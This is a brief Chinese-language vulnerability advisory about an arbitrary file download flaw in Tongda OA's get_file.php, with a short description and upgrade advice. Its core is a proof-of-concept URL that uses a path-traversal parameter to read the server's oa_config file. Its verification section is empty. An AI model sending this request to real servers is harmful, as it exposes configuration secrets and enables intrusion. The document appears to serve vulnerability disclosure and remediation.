漏洞验证-通达OA get_file任意文件下载漏洞

一、漏洞描述

通达OAQ get_file.php文件存在任意文件下载漏洞，攻击者通过漏洞可以读取服务器敏感文件。

二、漏洞POC

http://XXXX/module/AIP/get_file.php?MODULE=/&ATTACHMENT_NAME=php&ATTACHMENT_ID=.._webroot/inc/oa_config

三、漏洞验证

四、整改建议

1、联系官方进行升级到最新安全版本：https://www.tongda2000.com/。